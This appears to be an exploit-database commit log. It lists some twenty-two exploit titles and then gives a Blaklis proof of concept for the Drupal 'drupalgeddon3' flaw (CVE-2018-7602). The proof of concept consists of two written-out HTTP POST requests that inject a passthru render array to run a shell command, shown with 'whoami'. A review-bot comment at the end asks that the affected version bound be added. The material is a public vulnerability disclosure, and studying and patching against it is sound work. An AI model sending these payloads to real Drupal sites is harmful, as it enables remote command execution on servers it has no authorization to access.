
12 changes to exploits/shellcodes

Free Download Manager 2.0 Built 417 - Local Buffer Overflow (SEH)
Allok AVI to DVD SVCD VCD Converter 4.0.1217 - Buffer Overflow (SEH)
Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow
Shopy Point of Sale v1.0 - CSV Injection
Shopy Point of Sale 1.0 - CSV Injection
Drupal < 7.58 - 'drupalgeddon3' Authenticated Remote Code Execution (PoC)
Blog Master Pro v1.0 - CSV Injection
HRSALE The Ultimate HRM v1.0.2 - CSV Injection
HRSALE The Ultimate HRM v1.0.2 - 'award_id' SQL Injection
Blog Master Pro 1.0 - CSV Injection
HRSALE The Ultimate HRM 1.0.2 - CSV Injection
HRSALE The Ultimate HRM 1.0.2 - 'award_id' SQL Injection
HRSALE The Ultimate HRM v1.0.2 - Local File Inclusion
HRSALE The Ultimate HRM 1.0.2 - Local File Inclusion
Jfrog Artifactory < 4.16 - Unauthenticated Arbitrary File Upload / Remote Command Execution
WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion
SickRage < v2018.03.09 - Clear-Text Credentials HTTP Response
October CMS User Plugin 1.4.5 - Persistent Cross-Site Scripting
MyBB Threads to Link Plugin 1.3 - Cross-Site Scripting
GitList 0.6 - Unauthenticated Remote Code Execution
TP-Link Technologies TL-WA850RE Wi-Fi Range Extender - Unauthenticated Remote Reboot
Frog CMS 0.9.5 - Persistent Cross-Site Scripting
This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.
You must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).
POST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1
[...]
form_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]
Retrieve the form_build_id from the response, and then triggering the exploit with :
POST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1
[...]
form_build_id=[FORM_BUILD_ID]
This will display the result of the whoami command.
Patch your systems!
Blaklis
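
Review bot: the closing "Patch your systems!" line gives a reader nothing to check against, because the file names SA-CORE-2018-004 / CVE-2018-7602 on its first line but never states which releases are affected or fixed. The commit message carries a "Drupal < 7.58 - 'drupalgeddon3' Authenticated Remote Code Execution (PoC)" entry that appears to correspond to this file; repeat that version bound in the file itself, next to the precondition sentence ("You must be authenticated and with the power of deleting a node"), so the note can be used for triage without the commit log.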